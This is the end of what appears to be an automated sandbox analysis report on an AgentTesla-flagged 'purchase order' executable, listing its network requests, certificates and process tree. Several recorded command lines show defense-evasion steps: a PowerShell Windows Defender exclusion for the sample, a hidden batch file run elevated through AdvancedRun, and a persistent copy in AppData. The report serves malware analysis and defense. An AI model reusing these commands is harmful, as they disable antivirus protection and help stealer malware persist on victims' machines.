                                                                                    CF-RAY: 63cac859bfe2cdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0
                                                                                    Apr 8, 2021 12:23:56.045954943 CEST3572OUTGET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1
                                                                                    UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                                    Host: myliverpoolnews.cf
                                                                                    Apr 8, 2021 12:23:56.079735041 CEST3573INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Thu, 08 Apr 2021 10:23:56 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Thu, 08 Apr 2021 11:23:56 GMT
                                                                                    Location: https://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html
                                                                                    cf-request-id: 09529b9e9f0000cdbf9fbfa000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=97Le03BnatOCgR4SbWMWmhHMLzkEP16zTn7mEoWV1jeHIkiq1rtG6w8rZxl4YhJbqWEai4KACNehTkeiUeMcEynI5e%2BRPIy3hT8qpxRkfg%2FZ%2FhM%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 63cac877697ecdbf-CDG
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    HTTPS Packets

                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                    Apr 8, 2021 12:23:50.351607084 CEST172.67.150.212443192.168.2.349704CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Mar 31 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Thu Mar 31 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                    CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Analysis Process: 08042021New-PurchaseOrder.exe PID: 4952 Parent PID: 5680

                                                                                    General

                                                                                    Start time:12:23:48
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                                                                                    Imagebase:0x140000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Analysis Process: AdvancedRun.exe PID: 4436 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:02
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Analysis Process: AdvancedRun.exe PID: 5744 Parent PID: 4436

                                                                                    General

                                                                                    Start time:12:24:06
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Analysis Process: powershell.exe PID: 5828 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:11
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Analysis Process: conhost.exe PID: 5868 Parent PID: 5828

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: powershell.exe PID: 3636 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                                                                                    Imagebase:0x100000
                                                                                    File size:430592 bytes
                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Analysis Process: conhost.exe PID: 5904 Parent PID: 3636

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: cmd.exe PID: 1928 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:12
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                    Imagebase:0xd10000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: conhost.exe PID: 6224 Parent PID: 1928

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff6b2800000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: timeout.exe PID: 6284 Parent PID: 1928

                                                                                    General

                                                                                    Start time:12:24:18
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:timeout 1
                                                                                    Imagebase:0x1220000
                                                                                    File size:26112 bytes
                                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Analysis Process: 08042021New-PurchaseOrder.exe PID: 6388 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:22
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                                                                                    Imagebase:0xfa0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    Analysis Process: WerFault.exe PID: 6460 Parent PID: 4952

                                                                                    General

                                                                                    Start time:12:24:24
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                                                                                    Imagebase:0x1320000
                                                                                    File size:434592 bytes
                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:high

                                                                                    Analysis Process: SWqTT.exe PID: 3064 Parent PID: 3388

                                                                                    General

                                                                                    Start time:12:24:56
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0x810000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 15%, ReversingLabs
                                                                                    Reputation:low

                                                                                    Analysis Process: SWqTT.exe PID: 5192 Parent PID: 3388

                                                                                    General

                                                                                    Start time:12:25:05
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                                                                                    Imagebase:0xdf0000
                                                                                    File size:32008 bytes
                                                                                    MD5 hash:27233176A2A979195B01A53EC16C7631
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    Analysis Process: AdvancedRun.exe PID: 5204 Parent PID: 3064

                                                                                    General

                                                                                    Start time:12:25:10
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    Analysis Process: AdvancedRun.exe PID: 7116 Parent PID: 5192

                                                                                    General

                                                                                    Start time:12:25:25
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 3%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs

                                                                                    Analysis Process: AdvancedRun.exe PID: 5304 Parent PID: 5204

                                                                                    General

                                                                                    Start time:12:25:30
                                                                                    Start date:08/04/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                                                                                    Imagebase:0x400000
                                                                                    File size:91000 bytes
                                                                                    MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                    Reset < >